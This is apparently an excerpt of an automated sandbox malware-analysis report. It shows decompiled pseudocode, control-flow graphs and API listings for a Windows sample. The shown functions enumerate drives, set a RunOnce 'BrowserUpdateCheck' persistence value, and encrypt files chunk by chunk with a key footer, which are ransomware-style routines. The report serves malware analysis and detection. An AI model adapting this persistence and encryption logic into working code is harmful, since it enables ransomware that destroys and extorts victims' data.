                                                                                                                                                        control_flow_graph 154 40998f-4099db GetProcessHeap HeapAlloc GetLogicalDrives call 402647 157 409a33-409a37 154->157 158 4099dd-4099e0 154->158 161 409a39-409a44 157->161 162 409a8e-409aa8 WaitForMultipleObjects 157->162 159 4099e2-4099f3 GetDriveTypeA 158->159 160 409a28-409a31 158->160 163 4099f5-4099f8 159->163 164 4099ff-409a27 GetProcessHeap HeapAlloc lstrcpyA 159->164 160->157 160->158 165 409a46-409a8c GetProcessHeap HeapAlloc CreateThread 161->165 163->164 166 4099fa-4099fd 163->166 164->160 165->162 165->165 166->160 166->164
                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E0040998F(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                        				char _v2044;
                                                                                                                                                        				char _v2045;
                                                                                                                                                        				char _v2048;
                                                                                                                                                        				void* _v2160;
                                                                                                                                                        				unsigned int _t26;
                                                                                                                                                        				void* _t33;
                                                                                                                                                        				void* _t34;
                                                                                                                                                        				int _t36;
                                                                                                                                                        				CHAR* _t38;
                                                                                                                                                        				unsigned int _t40;
                                                                                                                                                        				intOrPtr _t41;
                                                                                                                                                        				signed int _t50;
                                                                                                                                                        				long _t51;
                                                                                                                                                        				void* _t52;
                                                                                                                                                        				void* _t53;
                                                                                                                                                        				void** _t55;
                                                                                                                                                        
                                                                                                                                                        				_t52 = HeapAlloc(GetProcessHeap(), 0, 0x70); // executed
                                                                                                                                                        				_t26 = GetLogicalDrives(); // executed
                                                                                                                                                        				_t40 = _t26;
                                                                                                                                                        				_v2048 = 0x5c3a41;
                                                                                                                                                        				_t51 = 0;
                                                                                                                                                        				E00402647( &_v2044, 0, 0x7fc);
                                                                                                                                                        				_t55 =  &(( &_v2160)[3]);
                                                                                                                                                        				if(_t40 == 0) {
                                                                                                                                                        					L7:
                                                                                                                                                        					_t50 = 0;
                                                                                                                                                        					if(_t51 <= 0) {
                                                                                                                                                        						L10:
                                                                                                                                                        						return WaitForMultipleObjects(_t51,  &_v2160, 1, 0xffffffff);
                                                                                                                                                        					}
                                                                                                                                                        					_t41 = _a8;
                                                                                                                                                        					_t53 = _t52 -  &_v2160;
                                                                                                                                                        					do {
                                                                                                                                                        						_t33 = HeapAlloc(GetProcessHeap(), 0, 0xc);
                                                                                                                                                        						 *((intOrPtr*)(_t33 + 4)) = _a4;
                                                                                                                                                        						 *((intOrPtr*)(_t33 + 8)) = _t41;
                                                                                                                                                        						 *_t33 =  *(_t55 + _t50 * 4 + _t53 + 0x10);
                                                                                                                                                        						_t34 = CreateThread(0, 0, E004096D7, _t33, 0, 0); // executed
                                                                                                                                                        						 *(_t55 + 0x10 + _t50 * 4) = _t34;
                                                                                                                                                        						_t50 = _t50 + 1;
                                                                                                                                                        					} while (_t50 < _t51);
                                                                                                                                                        					goto L10;
                                                                                                                                                        				} else {
                                                                                                                                                        					goto L1;
                                                                                                                                                        				}
                                                                                                                                                        				do {
                                                                                                                                                        					L1:
                                                                                                                                                        					if((_t40 & 0x00000001) != 0) {
                                                                                                                                                        						_t36 = GetDriveTypeA( &_v2048); // executed
                                                                                                                                                        						if(_t36 == 3 || _t36 == 2 || _t36 == 4) {
                                                                                                                                                        							_v2045 = 0;
                                                                                                                                                        							_t38 = HeapAlloc(GetProcessHeap(), 0, 3);
                                                                                                                                                        							 *(_t52 + _t51 * 4) = _t38;
                                                                                                                                                        							lstrcpyA(_t38,  &_v2048);
                                                                                                                                                        							_t51 = _t51 + 1;
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        					_v2048 = _v2048 + 1;
                                                                                                                                                        					_t40 = _t40 >> 1;
                                                                                                                                                        				} while (_t40 != 0);
                                                                                                                                                        				goto L7;
                                                                                                                                                        			}



















                                                                                                                                                        0x004099ac
                                                                                                                                                        0x004099ae
                                                                                                                                                        0x004099b9
                                                                                                                                                        0x004099bb
                                                                                                                                                        0x004099c6
                                                                                                                                                        0x004099d1
                                                                                                                                                        0x004099d6
                                                                                                                                                        0x004099db
                                                                                                                                                        0x00409a33
                                                                                                                                                        0x00409a33
                                                                                                                                                        0x00409a37
                                                                                                                                                        0x00409a8e
                                                                                                                                                        0x00409aa8
                                                                                                                                                        0x00409aa8
                                                                                                                                                        0x00409a39
                                                                                                                                                        0x00409a44
                                                                                                                                                        0x00409a46
                                                                                                                                                        0x00409a51
                                                                                                                                                        0x00409a5e
                                                                                                                                                        0x00409a6a
                                                                                                                                                        0x00409a71
                                                                                                                                                        0x00409a7f
                                                                                                                                                        0x00409a85
                                                                                                                                                        0x00409a89
                                                                                                                                                        0x00409a8a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004099dd
                                                                                                                                                        0x004099dd
                                                                                                                                                        0x004099e0
                                                                                                                                                        0x004099ea
                                                                                                                                                        0x004099f3
                                                                                                                                                        0x00409a03
                                                                                                                                                        0x00409a0e
                                                                                                                                                        0x00409a1b
                                                                                                                                                        0x00409a21
                                                                                                                                                        0x00409a27
                                                                                                                                                        0x00409a27
                                                                                                                                                        0x004099f3
                                                                                                                                                        0x00409a28
                                                                                                                                                        0x00409a2f
                                                                                                                                                        0x00409a2f
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000070,00000000,0000000A,76734AB0,00000000), ref: 004099A3
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 004099A6
                                                                                                                                                        • GetLogicalDrives.KERNELBASE ref: 004099AE
                                                                                                                                                        • GetDriveTypeA.KERNELBASE(?,?,?,000007FC), ref: 004099EA
                                                                                                                                                        • GetProcessHeap.KERNEL32 ref: 00409A0B
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00409A0E
                                                                                                                                                        • lstrcpyA.KERNEL32(00000000,?), ref: 00409A21
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,0000000C,?,?,000007FC), ref: 00409A4A
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,000007FC), ref: 00409A51
                                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,004096D7,00000000,00000000,00000000), ref: 00409A7F
                                                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000000,?,00000001,000000FF,?,?,000007FC), ref: 00409A98
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.587096613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$AllocProcess$CreateDriveDrivesLogicalMultipleObjectsThreadTypeWaitlstrcpy
                                                                                                                                                        • String ID: A:\
                                                                                                                                                        • API String ID: 1414558303-3379428675
                                                                                                                                                        • Opcode ID: 540c2f43f3c2d5659cf2064a90e8add0787454ccc78b47a1db6cb69330568b90
                                                                                                                                                        • Instruction ID: d8e149fb477fe738f546ee726c60a23c55f751ab8275eea61e7f40c8a7ff1760
                                                                                                                                                        • Opcode Fuzzy Hash: 540c2f43f3c2d5659cf2064a90e8add0787454ccc78b47a1db6cb69330568b90
                                                                                                                                                        • Instruction Fuzzy Hash: E03184B1608384AFD7249F64DD49FAB7B98FB80301F04493EF685E26E1DB789844CB65
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 167 409610-40963e _chkstk RegOpenKeyExW 168 409644-40967d RegQueryValueExW lstrcmpiW 167->168 169 4096cb-4096d4 167->169 170 4096c0-4096ca RegCloseKey 168->170 171 40967f-409699 RegCreateKeyExW 168->171 170->169 171->170 172 40969b-4096ba lstrlenW RegSetValueExW 171->172 172->170
                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E00409610(int _a4, short _a8, char* _a4108) {
                                                                                                                                                        				void* _v0;
                                                                                                                                                        				long _t15;
                                                                                                                                                        				long _t22;
                                                                                                                                                        				short* _t30;
                                                                                                                                                        				short* _t36;
                                                                                                                                                        
                                                                                                                                                        				L0040A3DA();
                                                                                                                                                        				_t30 = L"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce";
                                                                                                                                                        				_t15 = RegOpenKeyExW(0x80000001, _t30, 0, 0x20019,  &_v0); // executed
                                                                                                                                                        				if(_t15 == 0) {
                                                                                                                                                        					_a4 = 0x800;
                                                                                                                                                        					_t36 = L"BrowserUpdateCheck";
                                                                                                                                                        					RegQueryValueExW(_v0, _t36, 0, 0,  &_a8,  &_a4); // executed
                                                                                                                                                        					if(lstrcmpiW( &_a8, _a4108) != 0) {
                                                                                                                                                        						_t22 = RegCreateKeyExW(0x80000001, _t30, 0, 0, 1, 0x20006, 0,  &_v0, 0); // executed
                                                                                                                                                        						if(_t22 == 0) {
                                                                                                                                                        							RegSetValueExW(_v0, _t36, 0, 1, _a4108, lstrlenW(_a4108) + _t23); // executed
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        					_t15 = RegCloseKey(_v0); // executed
                                                                                                                                                        				}
                                                                                                                                                        				return _t15;
                                                                                                                                                        			}








                                                                                                                                                        0x00409615
                                                                                                                                                        0x0040962a
                                                                                                                                                        0x00409636
                                                                                                                                                        0x0040963e
                                                                                                                                                        0x00409649
                                                                                                                                                        0x00409656
                                                                                                                                                        0x00409663
                                                                                                                                                        0x0040967d
                                                                                                                                                        0x00409691
                                                                                                                                                        0x00409699
                                                                                                                                                        0x004096ba
                                                                                                                                                        0x004096ba
                                                                                                                                                        0x00409699
                                                                                                                                                        0x004096c4
                                                                                                                                                        0x004096ca
                                                                                                                                                        0x004096d4

                                                                                                                                                        APIs
                                                                                                                                                        • _chkstk.NTDLL(00409DCE,00000000), ref: 00409615
                                                                                                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020019,74E04CE0,00000000,00000000,74E04CE0,00409DCE,00000000), ref: 00409636
                                                                                                                                                        • RegQueryValueExW.KERNELBASE(?,BrowserUpdateCheck,00000000,00000000,?,?,?,?,?,?,?,?,00000020,00000000), ref: 00409663
                                                                                                                                                        • lstrcmpiW.KERNEL32(?,?,?,?,?,?,?,?,00000020,00000000,?,?,?,?,00409F25), ref: 00409675
                                                                                                                                                        • RegCreateKeyExW.KERNELBASE(80000001,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000001,00020006,00000000,00000800,00000000,?,?,?,?,?,?,00000020), ref: 00409691
                                                                                                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000020,00000000,?,?,?,?,00409F25), ref: 004096A2
                                                                                                                                                        • RegSetValueExW.KERNELBASE(?,BrowserUpdateCheck,00000000,00000001,?,00000000,?,?,?,?,?,?,00000020,00000000), ref: 004096BA
                                                                                                                                                        • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,00000020,00000000,?,?,?,?,00409F25), ref: 004096C4
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.587096613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Value$CloseCreateOpenQuery_chkstklstrcmpilstrlen
                                                                                                                                                        • String ID: BrowserUpdateCheck$Software\Microsoft\Windows\CurrentVersion\RunOnce
                                                                                                                                                        • API String ID: 2483246862-3331046949
                                                                                                                                                        • Opcode ID: fcf85857886e883fc72a97c37d27d33d9041c0383a062b11c9a884e72bb59fc8
                                                                                                                                                        • Instruction ID: 9145a9a92af7d0fd5e2789eb2f085285d76c0335ec543687b15714d6d2ab7fec
                                                                                                                                                        • Opcode Fuzzy Hash: fcf85857886e883fc72a97c37d27d33d9041c0383a062b11c9a884e72bb59fc8
                                                                                                                                                        • Instruction Fuzzy Hash: 43116075104354BBE7315F11EE48EEB7FACEF85795F00483AB989F0061D2758848D679
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 173 408d77-408dea call 402647 call 40274b CreateFileW 178 408df0-408dfe GetFileSizeEx 173->178 179 4091f1 173->179 178->179 181 408e04-408e0c 178->181 180 4091f3-4091f5 179->180 182 4091f7-4091f8 FindCloseChangeNotification 180->182 183 4091fe-40921c call 402765 call 406ca4 call 40289f 180->183 181->179 184 408e12-408e14 181->184 182->183 197 40921e-409228 183->197 186 408e15-408e27 call 40667a 184->186 191 408e29-408e2b 186->191 192 408e2d-408e2f 186->192 191->186 191->192 194 408e31-408e33 192->194 195 408e38-408e8b call 402889 call 406c91 call 406c72 call 406cea 192->195 194->197 195->180 207 408e91 195->207 208 408e93-408ea6 207->208 208->208 209 408ea8-408f0c call 406da2 call 406dc2 lstrlenW call 406dc2 call 406dea call 402625 208->209 220 408f13-408f58 call 402625 call 402647 call 402625 209->220 221 408f0e-408f12 209->221 228 408f59-408f8f call 406da2 call 406dc2 * 2 call 406dea 220->228 221->220 237 408f91-408fc7 call 4028b7 call 406e31 call 408ac1 228->237 244 408fc9-408fcc 237->244 245 408fce 237->245 246 408fd0-408fd3 244->246 245->246 247 408fe4-409011 call 402779 call 402647 246->247 248 408fd5-408fdf CloseHandle 246->248 253 409013 247->253 254 409038-409067 _alldiv _allrem 247->254 248->197 255 409015-40901b 253->255 256 40901d-409034 253->256 257 409097-4090db call 402779 call 402647 call 409fca 254->257 258 409069 254->258 255->254 255->256 256->254 257->248 268 4090e1-409170 call 402625 * 2 WriteFile call 40278d call 402765 call 408c4c 257->268 259 40906b-40906d 258->259 260 40906f-409082 _allrem 258->260 259->257 259->260 260->257 262 409084-409092 260->262 262->257 279 409172-409191 call 408c4c 268->279 280 409196-4091ef call 406f34 call 408ac1 call 402625 * 2 WriteFile 268->280 279->280 280->180
                                                                                                                                                        C-Code - Quality: 79%
                                                                                                                                                        			E00408D77(void* __ecx, void* __eflags) {
                                                                                                                                                        				intOrPtr _t107;
                                                                                                                                                        				void* _t108;
                                                                                                                                                        				void* _t116;
                                                                                                                                                        				signed int _t147;
                                                                                                                                                        				signed int _t172;
                                                                                                                                                        				signed int _t174;
                                                                                                                                                        				signed int _t177;
                                                                                                                                                        				signed int _t178;
                                                                                                                                                        				intOrPtr _t180;
                                                                                                                                                        				signed int _t182;
                                                                                                                                                        				void* _t221;
                                                                                                                                                        				signed int _t224;
                                                                                                                                                        				signed int _t230;
                                                                                                                                                        				signed int _t231;
                                                                                                                                                        				void* _t237;
                                                                                                                                                        				signed int _t238;
                                                                                                                                                        				signed int _t239;
                                                                                                                                                        				signed int _t240;
                                                                                                                                                        				void* _t241;
                                                                                                                                                        				signed int _t242;
                                                                                                                                                        				intOrPtr _t244;
                                                                                                                                                        				signed int _t245;
                                                                                                                                                        				signed int _t252;
                                                                                                                                                        				void* _t253;
                                                                                                                                                        				intOrPtr _t254;
                                                                                                                                                        				void* _t255;
                                                                                                                                                        				void* _t256;
                                                                                                                                                        				void* _t257;
                                                                                                                                                        				void* _t258;
                                                                                                                                                        				void* _t259;
                                                                                                                                                        				void* _t260;
                                                                                                                                                        				void* _t261;
                                                                                                                                                        
                                                                                                                                                        				 *((intOrPtr*)(_t255 + 0x28)) = 0;
                                                                                                                                                        				 *((intOrPtr*)(_t255 + 0x2c)) = 0;
                                                                                                                                                        				 *((intOrPtr*)(_t255 + 0x94)) = 0;
                                                                                                                                                        				E00402647(_t255 + 0x8c, 0, 0x114);
                                                                                                                                                        				 *((intOrPtr*)(_t255 + 0x1c)) = 0;
                                                                                                                                                        				 *((intOrPtr*)(_t255 + 0x20)) = 0;
                                                                                                                                                        				 *((intOrPtr*)(_t255 + 0x2c)) = 0;
                                                                                                                                                        				_t107 = E0040274B(0x20, 1);
                                                                                                                                                        				_t256 = _t255 + 0x14;
                                                                                                                                                        				 *(_t256 + 0x44) = 0;
                                                                                                                                                        				_t251 = _t107;
                                                                                                                                                        				 *((intOrPtr*)(_t256 + 0x3c)) = _t107;
                                                                                                                                                        				_t108 = CreateFileW( *(_t256 + 0x1bc), 0xc0000000, 0, 0, 3, 0x80000000, 0); // executed
                                                                                                                                                        				_t221 = _t108;
                                                                                                                                                        				if(_t221 == 0xffffffff) {
                                                                                                                                                        					L33:
                                                                                                                                                        					_t240 = 1;
                                                                                                                                                        					L34:
                                                                                                                                                        					__eflags = _t221;
                                                                                                                                                        					if(_t221 != 0) {
                                                                                                                                                        						FindCloseChangeNotification(_t221); // executed
                                                                                                                                                        					}
                                                                                                                                                        					E00402765(_t251);
                                                                                                                                                        					E00406CA4(_t256 + 0x10);
                                                                                                                                                        					E0040289F(_t256 + 0x88);
                                                                                                                                                        					return _t240;
                                                                                                                                                        				}
                                                                                                                                                        				_t116 = _t256 + 0x1c;
                                                                                                                                                        				__imp__GetFileSizeEx(_t221, _t116);
                                                                                                                                                        				if(_t116 == 0 || ( *(_t256 + 0x1c) |  *(_t256 + 0x20)) == 0) {
                                                                                                                                                        					goto L33;
                                                                                                                                                        				} else {
                                                                                                                                                        					_t241 = 0xf;
                                                                                                                                                        					do {
                                                                                                                                                        						_t241 = _t241 - 1;
                                                                                                                                                        					} while (E0040667A( *((intOrPtr*)(_t256 + 0x1b8)), _t251, 0x20) != 0 && _t241 != 0);
                                                                                                                                                        					if(_t241 >= 1) {
                                                                                                                                                        						 *((char*)(_t256 + 0x48)) = 0;
                                                                                                                                                        						 *((char*)(_t256 + 0x58)) = 0;
                                                                                                                                                        						asm("stosd");
                                                                                                                                                        						_t224 = 7;
                                                                                                                                                        						asm("stosd");
                                                                                                                                                        						asm("stosd");
                                                                                                                                                        						asm("stosw");
                                                                                                                                                        						asm("stosb");
                                                                                                                                                        						memset(_t256 + 0x59, 0, _t224 << 2);
                                                                                                                                                        						_t256 = _t256 + 0xc;
                                                                                                                                                        						asm("stosw");
                                                                                                                                                        						asm("stosb");
                                                                                                                                                        						E00402889(_t256 + 0x88);
                                                                                                                                                        						E00406C91(_t256 + 0x10);
                                                                                                                                                        						_t240 = E00406CEA(_t256 + 0x18, E00406C72(6), 1);
                                                                                                                                                        						__eflags = _t240;
                                                                                                                                                        						if(_t240 != 0) {
                                                                                                                                                        							goto L34;
                                                                                                                                                        						}
                                                                                                                                                        						_t231 = 0;
                                                                                                                                                        						__eflags = 0;
                                                                                                                                                        						do {
                                                                                                                                                        							_t227 = _t231 << 3;
                                                                                                                                                        							 *(_t256 + _t231 + 0x58) =  *(_t256 + 0x1c) >> _t231 << 3;
                                                                                                                                                        							_t231 = _t231 + 1;
                                                                                                                                                        							__eflags = _t231 - 8;
                                                                                                                                                        						} while (_t231 < 8);
                                                                                                                                                        						E00406DA2(_t256 + 0x10);
                                                                                                                                                        						E00406DC2(_t256 + 0x18, _t256 + 0x5c, 8);
                                                                                                                                                        						E00406DC2(_t256 + 0x18,  *((intOrPtr*)(_t256 + 0x1a8)), lstrlenW( *(_t256 + 0x1a4)));
                                                                                                                                                        						E00406DEA(_t256 + 0x14, _t256 + 0x58);
                                                                                                                                                        						E00402625(_t256 + 0x50, _t256 + 0x5c, 0x10);
                                                                                                                                                        						_t147 =  *(_t256 + 0x28) & 0xf;
                                                                                                                                                        						__eflags = _t147;
                                                                                                                                                        						if(_t147 < 0) {
                                                                                                                                                        							_t147 = (_t147 - 0x00000001 | 0xfffffff0) + 1;
                                                                                                                                                        							__eflags = _t147;
                                                                                                                                                        						}
                                                                                                                                                        						 *(_t256 + 0x30) = _t147;
                                                                                                                                                        						 *(_t256 + 0x63) = _t147;
                                                                                                                                                        						E00402625(_t256 + 0x8c, _t256 + 0x54, 0x10);
                                                                                                                                                        						_t237 = 0x20;
                                                                                                                                                        						E00402647(_t256 + 0x74, 0, _t237);
                                                                                                                                                        						E00402625(_t256 + 0x84, _t256 + 0x70, 0x10);
                                                                                                                                                        						_t257 = _t256 + 0x30;
                                                                                                                                                        						_t242 = 2;
                                                                                                                                                        						do {
                                                                                                                                                        							E00406DA2(_t257 + 0x10);
                                                                                                                                                        							E00406DC2(_t257 + 0x18, _t257 + 0x5c, _t237);
                                                                                                                                                        							E00406DC2(_t257 + 0x18, _t251, _t237);
                                                                                                                                                        							E00406DEA(_t257 + 0x14, _t257 + 0x58);
                                                                                                                                                        							_t242 = _t242 - 1;
                                                                                                                                                        							__eflags = _t242;
                                                                                                                                                        						} while (_t242 != 0);
                                                                                                                                                        						_push(0x100);
                                                                                                                                                        						_push(_t257 + 0x5c);
                                                                                                                                                        						_push(_t257 + 0x90);
                                                                                                                                                        						E004028B7();
                                                                                                                                                        						E00406E31(_t257 + 0x18, _t257 + 0x5c, _t237);
                                                                                                                                                        						_t172 = E00408AC1(_t227, _t231, _t221, _t242, _t242, 2); // executed
                                                                                                                                                        						__eflags = (_t172 & _t231) - 0xffffffff;
                                                                                                                                                        						if((_t172 & _t231) != 0xffffffff) {
                                                                                                                                                        							_t174 = 0;
                                                                                                                                                        							__eflags = 0;
                                                                                                                                                        						} else {
                                                                                                                                                        							_t174 = 1;
                                                                                                                                                        						}
                                                                                                                                                        						asm("cdq");
                                                                                                                                                        						__eflags = _t174 | _t231;
                                                                                                                                                        						if((_t174 | _t231) == 0) {
                                                                                                                                                        							 *((intOrPtr*)(_t257 + 0x3c)) = E00402779(0x200);
                                                                                                                                                        							_t177 = E00402647(_t176, 0, 0x200);
                                                                                                                                                        							_t238 =  *(_t257 + 0x30);
                                                                                                                                                        							_t244 =  *((intOrPtr*)(_t257 + 0x2c));
                                                                                                                                                        							_t258 = _t257 + 0x10;
                                                                                                                                                        							 *(_t258 + 0x40) = 0;
                                                                                                                                                        							_t252 = 0;
                                                                                                                                                        							__eflags = _t238;
                                                                                                                                                        							if(__eflags < 0) {
                                                                                                                                                        								L24:
                                                                                                                                                        								_push(0);
                                                                                                                                                        								_push(0x2000);
                                                                                                                                                        								_push(_t238);
                                                                                                                                                        								_push(_t244);
                                                                                                                                                        								L0040A3CE();
                                                                                                                                                        								_push(0);
                                                                                                                                                        								_push(0x2000);
                                                                                                                                                        								_push(_t238);
                                                                                                                                                        								_push(_t244);
                                                                                                                                                        								 *(_t258 + 0x38) = _t177;
                                                                                                                                                        								 *(_t258 + 0x44) = _t231;
                                                                                                                                                        								L0040A3D4();
                                                                                                                                                        								_t239 = _t177;
                                                                                                                                                        								_t245 = 0;
                                                                                                                                                        								_t178 = _t231;
                                                                                                                                                        								 *(_t258 + 0x38) = _t178;
                                                                                                                                                        								__eflags = _t178;
                                                                                                                                                        								if(__eflags < 0) {
                                                                                                                                                        									L29:
                                                                                                                                                        									_t67 = _t245 + 0x380; // 0x380
                                                                                                                                                        									 *((intOrPtr*)(_t258 + 0x34)) = _t67;
                                                                                                                                                        									_t180 = E00402779(_t67);
                                                                                                                                                        									_t69 = _t245 + 0x380; // 0x380
                                                                                                                                                        									_t229 = _t69;
                                                                                                                                                        									 *((intOrPtr*)(_t258 + 0x28)) = _t180;
                                                                                                                                                        									E00402647(_t180, 0, _t69);
                                                                                                                                                        									_t259 = _t258 + 0x10;
                                                                                                                                                        									_push(0x20);
                                                                                                                                                        									_push( *((intOrPtr*)(_t259 + 0x40)));
                                                                                                                                                        									_push( *0x40111c);
                                                                                                                                                        									_push( *((intOrPtr*)(_t259 + 0x1b4)));
                                                                                                                                                        									_push( *(_t259 + 0x3c));
                                                                                                                                                        									_t182 = E00409FCA(_t69, _t231, __eflags);
                                                                                                                                                        									__eflags = _t182;
                                                                                                                                                        									if(_t182 != 0) {
                                                                                                                                                        										goto L19;
                                                                                                                                                        									}
                                                                                                                                                        									E00402625(_t245 +  *((intOrPtr*)(_t259 + 0x24)),  *((intOrPtr*)(_t259 + 0x30)), 0x80);
                                                                                                                                                        									E00402625(_t245 +  *((intOrPtr*)(_t259 + 0x24)) + 0x80,  *((intOrPtr*)(_t259 + 0x1bc)), 0x300);
                                                                                                                                                        									_t260 = _t259 + 0x18;
                                                                                                                                                        									WriteFile(_t221,  *(_t259 + 0x3c),  *(_t260 + 0x38), _t259 + 0x5c, 0); // executed
                                                                                                                                                        									 *((intOrPtr*)(_t260 + 0x3c)) = E0040278D( *(_t259 + 0x3c), 0x30);
                                                                                                                                                        									E00402765( *((intOrPtr*)(_t260 + 0x34)));
                                                                                                                                                        									_t248 =  *((intOrPtr*)(_t260 + 0x44));
                                                                                                                                                        									_t261 = _t260 + 0xc;
                                                                                                                                                        									E00408C4C(_t229, _t231, _t221, 0, 0,  *(_t261 + 0x40),  *((intOrPtr*)(_t261 + 0x48)), _t239,  *((intOrPtr*)(_t260 + 0x44)), _t261 + 0x50, _t261 + 0x8c, _t260 + 0x1c); // executed
                                                                                                                                                        									_t230 =  *(_t261 + 0x40);
                                                                                                                                                        									__eflags = _t252 | _t230;
                                                                                                                                                        									if((_t252 | _t230) != 0) {
                                                                                                                                                        										E00408C4C(_t230, _t231, _t221, _t252, _t230,  *(_t261 + 0x40),  *((intOrPtr*)(_t261 + 0x48)), _t239, _t248, _t261 + 0x50, _t261 + 0x8c, _t261 + 0x10);
                                                                                                                                                        									}
                                                                                                                                                        									E00406F34(_t261 + 0x14, _t261 + 0x58);
                                                                                                                                                        									E00408AC1(_t230, _t231, _t221, 0, 0, 2); // executed
                                                                                                                                                        									_t253 =  *(_t261 + 0x30);
                                                                                                                                                        									E00402625(_t253, _t261 + 0x58, 0x20);
                                                                                                                                                        									_t100 = _t253 + 0x20; // 0x20
                                                                                                                                                        									E00402625(_t100, _t261 + 0x88, 0x10);
                                                                                                                                                        									_t256 = _t261 + 0x18;
                                                                                                                                                        									WriteFile(_t221, _t253, 0x30, _t256 + 0x44, 0); // executed
                                                                                                                                                        									_t251 =  *((intOrPtr*)(_t256 + 0x3c));
                                                                                                                                                        									_t240 = 0;
                                                                                                                                                        									goto L34;
                                                                                                                                                        								}
                                                                                                                                                        								if(__eflags > 0) {
                                                                                                                                                        									L27:
                                                                                                                                                        									_push(0);
                                                                                                                                                        									_push(2);
                                                                                                                                                        									_push( *((intOrPtr*)(_t258 + 0x3c)));
                                                                                                                                                        									_push( *((intOrPtr*)(_t258 + 0x34)));
                                                                                                                                                        									L0040A3D4();
                                                                                                                                                        									__eflags = _t178 | _t231;
                                                                                                                                                        									if((_t178 | _t231) == 0) {
                                                                                                                                                        										_t245 =  ~( *(_t258 + 0x24) & 0x000000ff) & 0x0000000f;
                                                                                                                                                        										_t239 = _t239 + _t245;
                                                                                                                                                        										asm("adc dword [esp+0x38], 0x0");
                                                                                                                                                        									}
                                                                                                                                                        									goto L29;
                                                                                                                                                        								}
                                                                                                                                                        								__eflags = _t239;
                                                                                                                                                        								if(_t239 == 0) {
                                                                                                                                                        									goto L29;
                                                                                                                                                        								}
                                                                                                                                                        								goto L27;
                                                                                                                                                        							}
                                                                                                                                                        							if(__eflags > 0) {
                                                                                                                                                        								L23:
                                                                                                                                                        								_t254 = _t244;
                                                                                                                                                        								_t177 = _t238;
                                                                                                                                                        								_t244 = 0x280000;
                                                                                                                                                        								_t238 = 0;
                                                                                                                                                        								_t252 = _t254 - 0x280000;
                                                                                                                                                        								__eflags = _t252;
                                                                                                                                                        								 *((intOrPtr*)(_t258 + 0x1c)) = 0x280000;
                                                                                                                                                        								 *((intOrPtr*)(_t258 + 0x20)) = 0;
                                                                                                                                                        								asm("sbb eax, ecx");
                                                                                                                                                        								 *(_t258 + 0x40) = _t177;
                                                                                                                                                        								goto L24;
                                                                                                                                                        							}
                                                                                                                                                        							__eflags = _t244 - 0x500000;
                                                                                                                                                        							if(_t244 <= 0x500000) {
                                                                                                                                                        								goto L24;
                                                                                                                                                        							}
                                                                                                                                                        							goto L23;
                                                                                                                                                        						} else {
                                                                                                                                                        							L19:
                                                                                                                                                        							CloseHandle(_t221);
                                                                                                                                                        							return 1;
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        					return 1;
                                                                                                                                                        				}
                                                                                                                                                        			}



































                                                                                                                                                        0x00408d91
                                                                                                                                                        0x00408d95
                                                                                                                                                        0x00408d99
                                                                                                                                                        0x00408da0
                                                                                                                                                        0x00408da7
                                                                                                                                                        0x00408dac
                                                                                                                                                        0x00408db3
                                                                                                                                                        0x00408db7
                                                                                                                                                        0x00408dbc
                                                                                                                                                        0x00408dbf
                                                                                                                                                        0x00408dc3
                                                                                                                                                        0x00408dc5
                                                                                                                                                        0x00408ddf
                                                                                                                                                        0x00408de5
                                                                                                                                                        0x00408dea
                                                                                                                                                        0x004091f1
                                                                                                                                                        0x004091f1
                                                                                                                                                        0x004091f3
                                                                                                                                                        0x004091f3
                                                                                                                                                        0x004091f5
                                                                                                                                                        0x004091f8
                                                                                                                                                        0x004091f8
                                                                                                                                                        0x004091ff
                                                                                                                                                        0x0040920a
                                                                                                                                                        0x00409217
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0040921c
                                                                                                                                                        0x00408df0
                                                                                                                                                        0x00408df6
                                                                                                                                                        0x00408dfe
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00408e12
                                                                                                                                                        0x00408e14
                                                                                                                                                        0x00408e15
                                                                                                                                                        0x00408e1f
                                                                                                                                                        0x00408e25
                                                                                                                                                        0x00408e2f
                                                                                                                                                        0x00408e3a
                                                                                                                                                        0x00408e43
